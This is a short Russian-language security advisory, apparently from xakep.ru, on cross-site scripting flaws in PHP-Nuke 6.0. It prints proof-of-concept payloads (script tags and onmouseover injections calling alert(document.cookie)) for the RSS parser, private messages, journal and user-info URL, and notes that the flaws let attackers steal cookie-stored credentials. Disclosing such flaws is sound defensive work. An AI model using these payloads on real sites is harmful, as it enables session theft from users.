PHPNuke — портальная система для UNIX и Windows. Уязвимость межсайтового скриптинга обнаружена в нескольких PHPNuke сценариях. Уязвимость позволяет атакующему выполнять произвольный код в контексте уязвимого Web сайта и может использоваться для перехвата опознавательной информации, хранящейся в куки пользователя. Пример: 

RDF/RSS Parser:

<item rdf:about=»http://www.somesite.dom»> 
<title><script>alert(‘cookie: ‘+ document.cookie)</script></title> 
<link>http://www.somesite.dom/</link> 
<description>Puke It</description> 
</item> 

Private Messages:

<a href=»https://xakep.ru/wp-content/uploads/post/16571/X» onmouseover=»alert(document.cookie»>x</a> — в сообщениях. 

Journal (Risk: critical) 

«<script> alert(document.cookie)</script>» — в любом
месте 

Your Info: 

http://x/"onmouseover="alert(document.cookie) — в URL. 

Уязвимость обнаружена в Francisco Burzi PHP-Nuke 6.0.



Оставить мнение